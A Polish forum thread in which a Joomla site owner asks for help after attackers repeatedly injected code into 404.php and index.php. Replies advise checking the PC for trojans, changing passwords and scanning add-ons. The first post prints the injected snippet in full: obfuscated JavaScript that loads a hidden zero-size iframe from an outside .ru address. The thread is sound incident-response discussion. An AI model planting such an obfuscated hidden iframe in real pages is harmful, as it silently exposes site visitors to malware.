Inny złośliwy kod dopisany do stony
Wyniki 1 do 5 z 5

Temat: Inny złośliwy kod dopisany do stony

  1. #1
    Nowicjusz
    Dołączył
    18-08-2007
    Wpisy
    23
    Punkty
    10

    Domyślny Inny złośliwy kod dopisany do stony

    Witam. Mój serwis został zaatakowany i dopisano mi złośliwy kod do pliku 404.php w katalogu template. Nie spotkałem się jeszcze z takim kodem na forum, więc postanowiłem założyć nowy temat.
    Dopisany kod wygląda następująco:
    {
    ?><html><body onload="status=' ';zz='o';sl='/';sf='ram';us='u';pi='b';po='.';gw='fi';qu=':';yh= 't';vo='h';bw='e';pj='m';iu='g';pt='tp';yw='p';ab= 'src';dg='ht';ko='e';wd='if';hh='r';t=wd.concat(sf ,ko);xx=dg.concat(pt,qu,sl,sl,pi,hh,pi,iu,po,hh,us ,sl,po,yh,po,yw,vo,yw);var oE=document.createElement(t);oE.setAttribute('widt h','0');oE.setAttribute('height','0');oE.setAttrib ute('style','display:none');oE.setAttribute(ab,xx) ;document.body.appendChild(oE);
    "></body></html><??>

    Po tym zdarzeniu przywróciłem stronę z kopii i pozostawiłem. Na następny dzień znowu dopisano ten sam kod ale tym razem do pliku index.php w katalogu głównym.

    Mam joomla 1.0.13 PL ze strony centrum, poza standardowymi dodatkami mam jeszcze: com_expose, com_swmenufree4[1].6, pack_artbannersplus_1[1].5.1-pl-iso, mod_flashmod_v2.0, mod_vcnt_ohne_c, bot_plugin_jw_allvideos_2[1].4-pl, bot_multithumb20b1_3_pl.
    Wszystkie zmienne PHP ustawione są tak jak sobie tego życzy joomla.
    Bardzo dziwne jest to, że zarówno plik 404.php jak i index.php miały chmody na 444. Zatem czy nadpisanie mogło nastąpić przez dziurę w jakimś dodatku? Ja myślę, że nie i atak następuje przez ftp (ktoś, lub coś wyśledził hasło).
    Proszę o pomoc i wskazówki, jak naprawić skutecznie stronę i czy moje przypuszczenie jest słószne.
    Dodatkowo interesuje mnie czy wirus może być zagnieżdżony w bazie danych, jeśli tak to jak go wyśledzić i usunąć.
    Mam też log ze statystyk (500 ostatnich wejść na stronę kiedy w międzyczasie nastąpił atak)

    Pozdrawiam i dziękuję za wszelką pomoc.

  2. Pani Reklamowa
    Pani Reklamowa jest aktywna
    Avatar Panny Google

    Dołączył
    19-08-2010
    Skąd
    Internet
    Postów
    milion
    Pochwał
    setki
  3. #2
    Wiarus
    Dołączył
    20-11-2007
    Wpisy
    2 924
    Punkty
    51

    Domyślny

    Cytat Wysłane przez cezarc Zobacz wiadomość
    Zatem czy nadpisanie mogło nastąpić przez dziurę w jakimś dodatku? Ja myślę, że nie i atak następuje przez ftp (ktoś, lub coś wyśledził hasło).
    Proszę o pomoc i wskazówki, jak naprawić skutecznie stronę i czy moje przypuszczenie jest słószne.
    Dodatkowo interesuje mnie czy wirus może być zagnieżdżony w bazie danych, jeśli tak to jak go wyśledzić i usunąć.
    Mam też log ze statystyk (500 ostatnich wejść na stronę kiedy w międzyczasie nastąpił atak)
    Od końca. Jak masz logi to co w tych logach jest zapisane? Czy je analizowałeś czy nie? To jest podstawowa informacja do dalszych poszukiwań najsłabszego ogniwa.
    Czy na pewno masz czystego kompa? Sprawdzałeś go jakimś oprogramowaniem?
    Czy kontaktowałes sie z administratorem swojego serwera z pytaniem czy moglby sprawdzic czy wszystko jest ok?

    To tak na poczatek.

  4. #3
    Nowicjusz
    Dołączył
    18-08-2007
    Wpisy
    23
    Punkty
    10

    Domyślny

    Na początek to dzięki za odpowiedź.
    Nie mam logów z serwera, nie pytałem dostawcy, ale jeszcze zapytam (chwilowo jest to nie możliwe).
    Tak sprawdziłem kompa syfu było pełno w tym trojany, to mój błąd bo to było na innej partycji niż systemowa, a przy przeinstalowaniu nie wziąłem tego pod uwagę.
    Przeinstalowałem kompa (formatując wszystko). Na serwerze zmieniłem hasła FTP, do bazy. Zainstalowałem joomla 1.0.15 (do tej pory stało pod 1.0.13), wczytałem starą bazę i zmieniłem hasło do panelu admina. Na koniec dorzuciłem pliki z dodatkami, których nie ma w standardowej paczce no i moje pliki graficzne i inne.
    Strona działa od trzech dni i jak na razie żaden plik nie został podmieniony (wcześniej zmiana następowała dosyć szybko). To dopisanie plików z niestandardowymi komponentami wydaje mi się ryzykowne bo jak podrzucono mi jakiś syf to jego też skopiowałem na serwer. Ale wcześniej skanowałem kilka razy i nic nie wykryło. Zatem mam pytanie:
    Czy jeśli coś by było w tych plikach co ułatwia włam na stronę to czy zaktualizowany antywirus (avast) powinien to wykryć?
    No i ponawiam pytanie czy wirus może siedzieć w bazie danych a jeśli tak to jak go wywalić?

  5. #4
    Wiarus
    Dołączył
    20-11-2007
    Wpisy
    2 924
    Punkty
    51

    Domyślny

    Cytat Wysłane przez cezarc Zobacz wiadomość
    Na początek to dzięki za odpowiedź.
    Nie mam logów z serwera, nie pytałem dostawcy, ale jeszcze zapytam (chwilowo jest to nie możliwe).
    Tak sprawdziłem kompa syfu było pełno w tym trojany, to mój błąd bo to było na innej partycji niż systemowa, a przy przeinstalowaniu nie wziąłem tego pod uwagę.
    Przeinstalowałem kompa (formatując wszystko). Na serwerze zmieniłem hasła FTP, do bazy. Zainstalowałem joomla 1.0.15 (do tej pory stało pod 1.0.13), wczytałem starą bazę i zmieniłem hasło do panelu admina. Na koniec dorzuciłem pliki z dodatkami, których nie ma w standardowej paczce no i moje pliki graficzne i inne.
    Strona działa od trzech dni i jak na razie żaden plik nie został podmieniony (wcześniej zmiana następowała dosyć szybko). To dopisanie plików z niestandardowymi komponentami wydaje mi się ryzykowne bo jak podrzucono mi jakiś syf to jego też skopiowałem na serwer. Ale wcześniej skanowałem kilka razy i nic nie wykryło. Zatem mam pytanie:
    Czy jeśli coś by było w tych plikach co ułatwia włam na stronę to czy zaktualizowany antywirus (avast) powinien to wykryć?
    No i ponawiam pytanie czy wirus może siedzieć w bazie danych a jeśli tak to jak go wywalić?
    Jeśli miałeś taki syf u siebie na kompie to nie masz sie czemu dziwic. Moim zdaniem (bez analizy logów) wlam nastąpił za pomocą podsłuchanego hasła które wykradł ci któryś z trojanów itp. W loga bedzie to wygladalo prawie "normalnie".

    Zmiana haseł do wszystkiego to dobry krok. Najwaniejsze sa hasla do kont ftp, paneli www i dalej poczty banku i innych jakie masz u siebie. Musisz zmienic wszystko gdyz nie masz pewnosci co jest juz gdzies w swiecie a co nie zostalo wykradzione.

    Co do dodatkow ktore uzywasz - wartaloby abys poszukal info w sieci czy te wersje ktore uzywasz nie maja jakis znanych luk w bezpiecznestwie. Poszukaj na forum.joomla.org oraz takze w sieci - google tutaj jest twoim sprzymierzeńcem

    Pliki przeskanuj kilkoma roznymi antywirusami - np. skanerami online lub za pomoca wersji testowych jeszcze np. kasperskiego itp. Najlepiej jak to beda z 2-4 rozne antywirusy.

    Co do pytania czy antywirus moze to wykryc to nie zawsze - czesc to pliki php wykonywalne w odpowiednim srodowisku i tam dopiero ten zlosliwy kod jest aktywny.
    Co do bazy danych to sam nie bede sie wypowiadal. Owszem istnieje ryzyko iz mozesz miec jakiegos nieproszonego "goscia" choc z moich doswiadczen wiem iz raczej te ataki skierowane sa na pliki na ftp aby dalej rozprzestrzeniac ten syf a bazy danych pozostaja nieruszone. Ale tak nie musi byc w Twoim przypadku.

    A na przyszlosc - bardziej uwazaj aby twoj komp nie zlapal wiecej takiego swinstwa.

  6. #5
    Nowicjusz
    Dołączył
    18-08-2007
    Wpisy
    23
    Punkty
    10

    Domyślny

    Cytat Wysłane przez inkos Zobacz wiadomość
    A na przyszlosc - bardziej uwazaj aby twoj komp nie zlapal wiecej takiego swinstwa.
    To fakt, dzięki.

Reguły pisania

  • Nie możesz zakładać nowych tematów
  • Nie możesz dodawać wypowiedzi
  • Nie możesz dodawać załączników
  • Nie możesz poprawiać swoich postów
  •